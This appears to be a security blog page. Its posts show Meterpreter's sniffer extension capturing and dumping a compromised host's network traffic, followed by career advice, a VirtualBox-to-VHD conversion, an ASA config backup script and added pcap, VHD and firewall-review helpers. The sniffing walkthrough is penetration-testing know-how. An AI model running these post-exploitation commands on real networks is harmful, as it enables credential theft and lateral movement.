Meterpreter allows you to run a packet sniffer through an extension, and something very important is that the sniffer is never written to the target's hard drive. I will explain how to enable the packet sniffer in Metasploit with Meterpreter:

 

Let's assume you already have a Meterpreter session from some exploit; then you type the following:

 

### Use the sniffer extension

 

meterpreter > use sniffer

 

Loading extension sniffer...success.

 

meterpreter > ?

 

 

....

 

Sniffer Commands

================

 

    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data to PCAP file

    sniffer_interfaces  Enumerate all sniffable network interfaces

    sniffer_release     Free captured packets on a specific interface instead of downloading them

    sniffer_start       Start packet capture on a specific interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet capture on a specific interface

 
 
### List the interfaces we can use to sniff the traffic
 
 
meterpreter > sniffer_interfaces
 
 
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
 
 
### Interface 2 is the network adapter, so we start the capture on that interface:
 
meterpreter > sniffer_start 2
 
[*] Capture started on interface 2 (50000 packet buffer)
 
 
### Stop the sniffer
 
meterpreter > sniffer_stop 2
 
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
 
 
### Download the data
 
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
 
 
Then I was able to open raul.pcap in Wireshark.
 
Summary
 
Where can you use this? You can use it to capture credentials and to move laterally on the network when you are pentesting, or to troubleshoot a computer problem on the network.
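Before trusting a dump, it is worth checking that the file Meterpreter wrote is a complete, well-formed pcap and that its record count matches what sniffer_stop reported (3099 packets in the session above). The following Python parser is an added example and not part of the original post or of Metasploit; the file path and the two-packet sample pcap it builds are constructed for illustration.

```python
import struct

# Classic pcap magic values: A1B2C3D4 = microsecond timestamps, A1B23C4D = nanosecond.
PCAP_MAGIC_US = 0xA1B2C3D4
PCAP_MAGIC_NS = 0xA1B23C4D
GLOBAL_HEADER_LEN = 24
RECORD_HEADER_LEN = 16


def summarize_pcap(data):
    """Walk every record of a classic pcap byte string and return a summary dict.

    Raises ValueError when the header is not pcap, a record length is impossible,
    or the file ends in the middle of a record (e.g. an interrupted download).
    """
    if len(data) < GLOBAL_HEADER_LEN:
        raise ValueError('shorter than the %d-byte pcap global header' % GLOBAL_HEADER_LEN)
    magic, = struct.unpack('<I', data[:4])
    if magic in (PCAP_MAGIC_US, PCAP_MAGIC_NS):
        endian = '<'
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):      # the same magics written big-endian
        endian = '>'
    else:
        raise ValueError('not a classic pcap file (magic 0x%08x)' % magic)
    _, vmajor, vminor, _, _, snaplen, linktype = struct.unpack(
        endian + 'IHHiIII', data[:GLOBAL_HEADER_LEN])

    offset = GLOBAL_HEADER_LEN
    packets = captured_bytes = truncated = 0
    while offset < len(data):
        if len(data) - offset < RECORD_HEADER_LEN:
            raise ValueError('trailing %d bytes at offset %d are not a record header'
                             % (len(data) - offset, offset))
        _, _, incl_len, orig_len = struct.unpack(
            endian + 'IIII', data[offset:offset + RECORD_HEADER_LEN])
        if incl_len > snaplen or incl_len > orig_len:
            raise ValueError('record %d at offset %d has impossible length %d'
                             % (packets, offset, incl_len))
        if offset + RECORD_HEADER_LEN + incl_len > len(data):
            raise ValueError('record %d at offset %d is cut short: file truncated?'
                             % (packets, offset))
        packets += 1
        captured_bytes += incl_len
        if incl_len < orig_len:
            truncated += 1            # snaplen clipped this packet
        offset += RECORD_HEADER_LEN + incl_len
    return {'version': (vmajor, vminor), 'linktype': linktype, 'snaplen': snaplen,
            'packets': packets, 'captured_bytes': captured_bytes,
            'truncated_packets': truncated}


def check_dump(path, expected_packets):
    """Open a dumped pcap and compare its record count with what sniffer_stop reported."""
    with open(path, 'rb') as f:
        summary = summarize_pcap(f.read())
    return summary['packets'] == expected_packets, summary


def build_sample_pcap():
    """Constructed two-packet pcap (not a real sniffer_dump file) so the parser runs offline."""
    header = struct.pack('<IHHiIII', PCAP_MAGIC_US, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    records = b''
    for i, payload in enumerate([b'\x00' * 60, b'\xff' * 100]):
        records += struct.pack('<IIII', 1600000000 + i, 0, len(payload), len(payload)) + payload
    return header + records


if __name__ == '__main__':
    # With a real dump: ok, summary = check_dump('/root/raul.pcap', 3099)
    print(summarize_pcap(build_sample_pcap()))
```

A mismatch between the record count and the number sniffer_stop printed, or a ValueError about a cut-short record, means the download did not complete and the capture should be dumped again before it is released.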
 
 
 
 

A lot of people want to be an ethical hacker or penetration tester. It is a very rewarding job and it also requires a lot of effort. I will describe in this article what knowledge you need if you want to be an ethical hacker. I will not touch the soft skills, only the technical ones.

 

First, this is not an easy path. It requires perseverance and a lot of self-study, including thinking completely differently from any other tech role (outside the box).

 

Basic Knowledge

 

Yes, you need basic knowledge and it has to be very solid; you do not have the luxury of holes in your basic knowledge.

 

Knowledge of the Windows and Linux operating systems: you have to be strong in one of them and very proficient in the other. I am not saying you should be able to build a cluster with those servers; I am saying you need the same knowledge a System Admin or System Engineer working for an IT company has (yes, working for an IT company is very different from working for a single company).

 

Network knowledge: yes, you have to know how routing works, TCP/UDP, packets, routers, switches, ARP, firewalls, etc. How will you bypass a firewall if you do not know how it works, or sniff traffic if you do not understand switches?

 

Programming knowledge: you have to have one language in which you are strong, and if you are going into web ethical hacking you need more than one language. A lot of hackers use Perl and Python.

 

Specialty Knowledge

 

This depends on what you want to be good at; you cannot be strong in every specialty, with some exceptions. These are some examples:

 

Specialty: Attacking Networks. For this you need good knowledge of protocols, routers, switches, firewalls, Wi-Fi, packets, etc.

 

Specialty: Attacking Systems. This includes a lot of the network material, because you work with packets, etc., plus good knowledge of Windows/Linux and how to escalate privileges to become an administrator on the server or the domain.

 

Specialty: Attacking Web Applications. Here you need knowledge of different web programming languages like ASP, PHP, Java, etc. You also need good database knowledge; yes, how will you attempt SQL injection when you do not know anything about SQL queries?

 

Conclusion

 

A lot of ethical hackers have a mix of skills. They are normally strong in one specialty and a little weaker in the others. In the beginning, do not worry about which skills you will have; begin building your skills and later you will find which of those fields you want to be in and go for it. Enjoy the whole process.

 

You got a phone call for a Security Analyst position in your area. You are excited; you have been applying for that kind of position, and now you have their attention and a first phone interview. What will you do?

 

You will need to follow the same steps a hacker does when attacking a company; let's check them:

 

Phase 1 - Reconnaissance

 

Yes, you will need to gather information about the company and the person or people who will do the first phone interview. Sure, the recruiter will tell you their name(s) and the time.

 

With the name(s) and the company name you begin to research. The first thing is the company website: you need to know what the company does and what it means, inside and out, including what positions are available, the requirements, etc.

 

Now, with the interviewer's name, find everything you possibly can: check LinkedIn, Google+, Facebook, etc. Yes, sometimes you can find on the Internet where he/she lives and what kind of sport he/she plays; the more you know about that person (or people), the better your chance to connect.

 

Phase 2 - Scanning

 

During the phone interview you have the chance to send a few packets: you have the chance to ask questions about the position, the requirements and the environment. Ask interesting questions, and those questions have to be prepared before the phone interview. Do not ask uncomfortable questions; you do not want to crash your target.

 

Phase 3 - Gaining Access

 

This is the face-to-face interview. Here you will be able to send your exploits: show them who you are, your technical and non-technical skills, like good communication skills. Show them that the ideal person for the Security Analyst position is YOU.

 

Remember, in this phase you are still discovering; now you need to scan more, and a little more: ask more questions, and remember not to crash the server, you do not want a denial of service (DoS).

 

Phase 4 - Maintaining Access

 

In this phase, after the phone and face-to-face interviews, send an email saying what you got out of the interview, showing you are interested in the position and leaving the door open for more questions from them: maintain your access.

 

Phase 5 - Covering Tracks

 

If you got the position, CONGRATULATIONS, and if not, you got a lot of experience in this pentest and you will nail the next one; remember, pentesters have to be the masters. Also, in the situation where you did not get the position, send an email thanking them for the interview; who knows, they may keep you in mind and could change their decision.

 

If you look at your job search like a penetration testing process, then first you will enjoy it and second you will increase your self-confidence and your success.

 

Keep going and enjoy the process.

 

Please tell me what you think in the forum at http://www.learn-security.net/

 

Sometimes we have everything in front of us and we begin to look somewhere else, when it was something simple.

 

VirtualBox has a tool that does the job for us, and very quickly:

 

I have a virtual machine in VirtualBox that I want to move to Hyper-V, so I did the following:

 

Hard drive name: CEH-XP.vdi

 

1. First we go to where VirtualBox is installed: cd C:\Program Files\Oracle\VirtualBox

 

2. Now I use the vboxmanage tool with the clonehd switch:

 

C:\Program Files\Oracle\VirtualBox>vboxmanage clonehd "E:\Images\Virtual machines\CEH\CEH-XP.vdi" z:\ceh-xp.vhd --format vhd

 

0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%

 

Clone hard disk created in format 'vhd'. UUID: 801c7ac4-b396-42cb-bf9a-939d78ad08f8

 

As you may have noticed, my hard drive was on the E drive and my destination was on the Z drive; your case is going to be different.

 

3. Now we create a virtual machine in Hyper-V without a hard drive and attach the resulting hard drive to the virtual machine, in my case ceh-xp.vhd.

 

This was quicker than exporting to OVF and later converting to another format.
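Before attaching the converted disk to a Hyper-V machine, it is worth confirming that the .vhd really ends in a valid VHD footer (the 512-byte structure that starts with the "conectix" cookie and carries a one's-complement checksum); a copy that was interrupted or truncated fails that check. The Python validator below is an added example, not part of the original post or of VirtualBox; the path given on the command line and the sample fixed-disk footer it constructs are assumptions for illustration.

```python
import struct
import uuid

VHD_FOOTER_SIZE = 512
VHD_DISK_TYPES = {0: 'none', 2: 'fixed', 3: 'dynamic', 4: 'differencing'}
FIXED_DISK_DATA_OFFSET = 0xFFFFFFFFFFFFFFFF
# Big-endian footer layout up to and including the unique id (84 bytes);
# the remaining 428 bytes are the saved-state byte and reserved padding.
_FOOTER_FMT = '>8sIIQI4sI4sQQIII16s'


def vhd_checksum(footer):
    """One's complement of the sum of all footer bytes, with the checksum field (offset 64) zeroed."""
    zeroed = footer[:64] + b'\x00' * 4 + footer[68:]
    return (~sum(zeroed)) & 0xFFFFFFFF


def parse_vhd_footer(footer):
    """Decode a 512-byte VHD footer and report whether its checksum verifies."""
    if len(footer) != VHD_FOOTER_SIZE:
        raise ValueError('VHD footer must be exactly %d bytes' % VHD_FOOTER_SIZE)
    (cookie, _features, version, data_offset, _timestamp, creator_app, _creator_ver,
     _creator_os, original_size, current_size, _geometry, disk_type, checksum,
     unique_id) = struct.unpack(_FOOTER_FMT, footer[:struct.calcsize(_FOOTER_FMT)])
    if cookie != b'conectix':
        raise ValueError('missing "conectix" cookie: not a VHD footer')
    return {
        'format_version': '%d.%d' % (version >> 16, version & 0xFFFF),
        'creator': creator_app.decode('ascii', 'replace'),
        'disk_type': VHD_DISK_TYPES.get(disk_type, 'unknown(%d)' % disk_type),
        'current_size': current_size,
        'original_size': original_size,
        'data_offset': data_offset,
        'unique_id': str(uuid.UUID(bytes=unique_id)),
        'checksum_ok': checksum == vhd_checksum(footer),
    }


def footer_problems(info):
    """Return the reasons a parsed footer should not be trusted (empty list if it looks sane)."""
    problems = []
    if not info['checksum_ok']:
        problems.append('footer checksum mismatch (truncated or corrupted image?)')
    if info['disk_type'].startswith('unknown'):
        problems.append('unsupported disk type %s' % info['disk_type'])
    if info['disk_type'] == 'fixed' and info['data_offset'] != FIXED_DISK_DATA_OFFSET:
        problems.append('fixed disk must have data offset 0xFFFFFFFFFFFFFFFF')
    if info['current_size'] == 0:
        problems.append('current size is zero')
    return problems


def validate_vhd_file(path):
    """Read the trailing footer of a .vhd file and return (info, problems)."""
    with open(path, 'rb') as f:
        f.seek(-VHD_FOOTER_SIZE, 2)
        info = parse_vhd_footer(f.read(VHD_FOOTER_SIZE))
    return info, footer_problems(info)


def build_sample_footer(current_size=4 * 1024 ** 3, disk_type=2):
    """Constructed footer for a fixed 4 GiB disk so the checks run offline; not real VirtualBox output."""
    unique_id = bytes(range(16))  # constructed id, not a real disk's UUID
    body = struct.pack(_FOOTER_FMT, b'conectix', 2, 0x00010000, FIXED_DISK_DATA_OFFSET,
                       0, b'vbox', 0, b'Wi2k', current_size, current_size,
                       0, disk_type, 0, unique_id)
    footer = body + b'\x00' * (VHD_FOOTER_SIZE - len(body))
    return footer[:64] + struct.pack('>I', vhd_checksum(footer)) + footer[68:]


if __name__ == '__main__':
    import sys
    # Usage: python check_vhd.py z:\ceh-xp.vhd  (path is an assumption)
    info, problems = validate_vhd_file(sys.argv[1])
    print(info)
    print('OK' if not problems else 'PROBLEMS: ' + '; '.join(problems))
```

Dynamic VHDs also keep a copy of this footer at offset 0, so the same parser can be pointed at the first 512 bytes when the trailing copy is damaged.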

Twice a year the Security Analyst needs to do a firewall review for PCI or other compliance. Yes, we need something that can automatically grab the latest firewall configuration so we can analyze it. I will describe in this blog one simple Python script to grab the configuration, with explanations.

 

I am using in this script the pexpect module, which lets us connect as if we were typing at the console itself, plus getpass to read the passwords at run time instead of hard-coding them. This script will ask you for the firewall's IP address.

 

The script begins (copy from below):

import getpass

import pexpect

asa_ip = input('Please Enter ASA IP: ')

user = "your-username-on-the-device"

# Read the passwords at run time instead of hard-coding them in the script
password = getpass.getpass('Login password: ')

password_enable = getpass.getpass('Enable password: ')

outfile = 'firewall.%s.txt' % asa_ip

# This establishes the SSH connection; encoding='utf-8' makes pexpect work with
# str instead of bytes, so the log file can be a normal text file
# (assumes the host key of the ASA is already known to ssh)
child = pexpect.spawn('ssh %s@%s' % (user, asa_ip), encoding='utf-8')

# This file logs the result
fout = open(outfile, 'w')

# Expect the device to ask for the password and send it
child.expect('password:')

child.sendline(password)

# Expect the '>' prompt and type enable
child.expect('>')

child.sendline('enable')

# Expect the enable password prompt and send the password
child.expect('Password:')

child.sendline(password_enable)

child.expect('#')

# Send 'terminal pager 0' so the ASA does not stop after every page; without it the
# script waits for a key press that never comes and times out
child.sendline('terminal pager 0')

child.expect('#')

# Allow a large read buffer and a long timeout: a full running-config can be big
child.maxread = 999999999

child.timeout = 360

# From here on, put everything read from the device into the log file
child.logfile_read = fout

# Send the sh running-config command and expect ': end', which closes the configuration
child.sendline('sh running-config')

child.expect(': end')

print(child.before)

child.sendline('exit')

child.close()

# Close the log so it is flushed before we read it back
fout.close()

# Clean the file, removing the echoed command on the first line
with open(outfile, 'r') as fin:
        data = fin.read().splitlines(True)

with open(outfile, 'w') as fout:
        fout.writelines(data[1:])

# Finish script
 
At the end, the script will create a txt file containing the firewall configuration. You can use this script to back up your configuration or to begin your firewall review.
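Once the configuration is in the txt file, the firewall review itself can start from a few automated checks. The Python script below is an added example, not part of the original post: it parses the extended access-list lines of an ASA running-config and flags any-to-any permits, telnet management access, SSH version 1 and default SNMP community strings. The sample configuration embedded in it is constructed for illustration, not taken from a real device.

```python
import re

ANY_TOKENS = {'any', 'any4', 'any6'}
# Only extended ACLs are analysed; standard ACLs on the ASA are used for routing, not filtering.
ACL_RE = re.compile(r'^access-list\s+(\S+)\s+extended\s+(permit|deny)\s+(.*)$')

# Constructed sample of what the script's txt file could contain (not a real device's config).
SAMPLE_CONFIG = """\
: Saved
ASA Version 9.1(2)
!
hostname fw-edge
!
interface GigabitEthernet0/0
 nameif outside
 security-level 0
!
access-list OUTSIDE_IN extended permit tcp any host 10.1.1.10 eq 443
access-list OUTSIDE_IN extended permit ip any any
access-list INSIDE_OUT extended permit tcp 10.0.0.0 255.0.0.0 any eq 80
access-list MGMT extended permit tcp any4 any4 eq 22
access-group OUTSIDE_IN in interface outside
telnet 0.0.0.0 0.0.0.0 inside
telnet timeout 5
ssh version 1
snmp-server host inside 10.1.1.20 community public
: end
"""


def _take_endpoint(tokens, i):
    """Consume one ACL source/destination starting at tokens[i]; return (text, next index)."""
    if i >= len(tokens):
        return '', i
    if tokens[i] in ANY_TOKENS:
        return tokens[i], i + 1
    # 'host X', 'object X', 'object-group X', 'interface X' and 'addr mask' all take two tokens
    return ' '.join(tokens[i:i + 2]), i + 2


def parse_extended_acl(rest):
    """Split 'proto src dst [ports]' into its parts."""
    tokens = rest.split()
    if tokens[0] == 'object-group':          # protocol given as a service object group
        proto, i = ' '.join(tokens[:2]), 2
    else:
        proto, i = tokens[0], 1
    src, i = _take_endpoint(tokens, i)
    dst, i = _take_endpoint(tokens, i)
    return proto, src, dst, ' '.join(tokens[i:])


def review_config(text):
    """Return a list of findings (dicts) for the review-worthy lines in an ASA running-config."""
    findings = []

    def add(n, severity, reason, line):
        findings.append({'line': n, 'severity': severity, 'reason': reason, 'text': line})

    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(('!', ':')):
            continue
        m = ACL_RE.match(line)
        if m:
            name, action, rest = m.groups()
            proto, src, dst, ports = parse_extended_acl(rest)
            if action == 'permit' and src in ANY_TOKENS and dst in ANY_TOKENS:
                add(n, 'high', 'ACL %s permits %s from any source to any destination %s'
                    % (name, proto, ports or '(all ports)'), line)
            continue
        if line.startswith('telnet ') and not line.startswith('telnet timeout'):
            add(n, 'high', 'telnet management access is enabled (cleartext)', line)
        elif line == 'ssh version 1':
            add(n, 'medium', 'SSH version 1 allowed', line)
        elif line.startswith('snmp-server') and re.search(r'\bcommunity\s+(public|private)\b', line):
            add(n, 'high', 'default SNMP community string', line)
    return findings


if __name__ == '__main__':
    # With the file the script above produced: review_config(open('firewall.<ip>.txt').read())
    for f in review_config(SAMPLE_CONFIG):
        print('[%s] line %d: %s\n    %s' % (f['severity'], f['line'], f['reason'], f['text']))
```

Each finding carries the line number in the txt file, so the reviewer can go straight to the rule in question; object and object-group references are kept as text rather than resolved, which is the first thing to extend for a fuller review.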